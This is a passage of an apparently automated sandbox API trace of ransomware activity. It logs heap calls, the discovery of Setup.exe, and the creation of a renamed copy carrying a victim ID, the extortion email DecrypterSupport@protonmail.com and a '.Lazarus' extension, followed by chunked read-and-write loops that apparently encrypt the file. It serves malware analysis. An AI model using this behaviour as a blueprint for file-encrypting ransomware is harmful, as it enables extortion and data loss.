lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b568 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0079.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.166] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148, dwReserved0=0x1, dwReserved1=0x0, cFileName="Setup.exe", cAlternateFileName="")) returned 1 [0079.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0079.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5ca00 | out: hHeap=0x20000) returned 1 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69300 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69300 | out: hHeap=0x20000) returned 1 [0079.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0079.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.167] AreFileApisANSI () returned 1 [0079.167] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Setup.exe", lpUsedDefaultChar=0x0) returned 32 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0079.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.167] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0079.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0079.168] AreFileApisANSI () returned 1 [0079.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0079.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0079.168] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x538c8, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0079.168] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0079.168] GetFileType (hFile=0x42c) returned 0x1 [0079.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0079.168] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0079.168] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0079.168] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0079.169] CloseHandle (hObject=0x42c) returned 1 [0079.169] AreFileApisANSI () returned 1 [0079.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0079.169] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53838, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0079.169] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0079.169] GetFileType (hFile=0x42c) returned 0x1 [0079.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0079.169] CloseHandle (hObject=0x42c) returned 1 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0079.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0079.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0079.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0079.170] AreFileApisANSI () returned 1 [0079.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0079.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0079.170] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x13148)) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0079.170] AreFileApisANSI () returned 1 [0079.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0079.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0079.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0079.171] GetLastError () returned 0x0 [0079.171] SetLastError (dwErrCode=0x0) [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e420 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x85fc0 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8c170 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6f0 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d660 [0079.171] GetLastError () returned 0x0 [0079.171] SetLastError (dwErrCode=0x0) [0079.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x47) returned 0x693f0 [0079.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75e40 [0079.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0079.171] AreFileApisANSI () returned 1 [0079.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 94 [0079.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbc) returned 0x5a6b8 [0079.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75e40, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=94 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 94 [0079.171] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\setup.exe.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0079.172] GetFileType (hFile=0x42c) returned 0x1 [0079.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0079.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0079.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0079.172] AreFileApisANSI () returned 1 [0079.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 32 [0079.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0079.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x885b8, cbMultiByte=-1, lpWideCharStr=0x533b8, cchWideChar=32 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Setup.exe") returned 32 [0079.172] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Setup.exe" (normalized: "c:\\588bce7c90097ed212\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0079.172] GetFileType (hFile=0x428) returned 0x1 [0079.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0079.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0079.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5ca00 [0079.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.173] GetLastError () returned 0x0 [0079.173] SetLastError (dwErrCode=0x0) [0079.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0079.173] GetLastError () returned 0x0 [0079.173] SetLastError (dwErrCode=0x0) [0079.173] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0079.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0079.173] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0079.173] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0079.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0079.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6d8 [0079.175] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x93678 [0079.175] GetLastError () returned 0x0 [0079.175] SetLastError (dwErrCode=0x0) [0079.175] GetLastError () returned 0x0 [0079.175] SetLastError (dwErrCode=0x0) [0079.176] GetLastError () returned 0x0 [0079.176] SetLastError (dwErrCode=0x0) [0079.176] GetLastError () returned 0x0 [0079.176] SetLastError (dwErrCode=0x0) [0079.176] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.176] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.177] GetLastError () returned 0x0 [0079.177] SetLastError (dwErrCode=0x0) [0079.177] GetLastError () returned 0x0 [0079.177] SetLastError (dwErrCode=0x0) [0079.177] GetLastError () returned 0x0 [0079.177] SetLastError (dwErrCode=0x0) [0079.178] GetLastError () returned 0x0 [0079.178] SetLastError (dwErrCode=0x0) [0079.178] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.178] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.178] GetLastError () returned 0x0 [0079.178] SetLastError (dwErrCode=0x0) [0079.178] GetLastError () returned 0x0 [0079.178] SetLastError (dwErrCode=0x0) [0079.178] GetLastError () returned 0x0 [0079.178] SetLastError (dwErrCode=0x0) [0079.178] GetLastError () returned 0x0 [0079.178] SetLastError (dwErrCode=0x0) [0079.179] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.179] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.179] GetLastError () returned 0x0 [0079.179] SetLastError (dwErrCode=0x0) [0079.179] GetLastError () returned 0x0 [0079.179] SetLastError (dwErrCode=0x0) [0079.179] GetLastError () returned 0x0 [0079.179] SetLastError (dwErrCode=0x0) [0079.179] GetLastError () returned 0x0 [0079.179] SetLastError (dwErrCode=0x0) [0079.179] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.180] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.180] GetLastError () returned 0x0 [0079.180] SetLastError (dwErrCode=0x0) [0079.180] GetLastError () returned 0x0 [0079.180] SetLastError (dwErrCode=0x0) [0079.180] GetLastError () returned 0x0 [0079.180] SetLastError (dwErrCode=0x0) [0079.180] GetLastError () returned 0x0 [0079.180] SetLastError (dwErrCode=0x0) [0079.180] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.180] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.181] GetLastError () returned 0x0 [0079.181] SetLastError (dwErrCode=0x0) [0079.181] GetLastError () returned 0x0 [0079.181] SetLastError (dwErrCode=0x0) [0079.181] GetLastError () returned 0x0 [0079.181] SetLastError (dwErrCode=0x0) [0079.181] GetLastError () returned 0x0 [0079.181] SetLastError (dwErrCode=0x0) [0079.182] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.182] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.182] GetLastError () returned 0x0 [0079.182] SetLastError (dwErrCode=0x0) [0079.182] GetLastError () returned 0x0 [0079.182] SetLastError (dwErrCode=0x0) [0079.182] GetLastError () returned 0x0 [0079.182] SetLastError (dwErrCode=0x0) [0079.182] GetLastError () returned 0x0 [0079.182] SetLastError (dwErrCode=0x0) [0079.182] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.183] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.183] GetLastError () returned 0x0 [0079.183] SetLastError (dwErrCode=0x0) [0079.183] GetLastError () returned 0x0 [0079.183] SetLastError (dwErrCode=0x0) [0079.183] GetLastError () returned 0x0 [0079.183] SetLastError (dwErrCode=0x0) [0079.183] GetLastError () returned 0x0 [0079.183] SetLastError (dwErrCode=0x0) [0079.183] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0079.183] WriteFile (in: hFile=0x42c, lpBuffer=0x93678*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x93678*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0079.184] GetLastError () returned 0x0 [0079.184] SetLastError (dwErrCode=0x0) [0079.184] GetLastError () returned 0x0 [0079.184] SetLastError (dwErrCode=0x0) [0079.184] GetLastError () returned 0x0 [0079.184] SetLastError (dwErrCode=0x0) [0079.184] GetLastError () returned 0x0 [0079.184] SetLastError (dwErrCode=0x0) [0079.184] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, 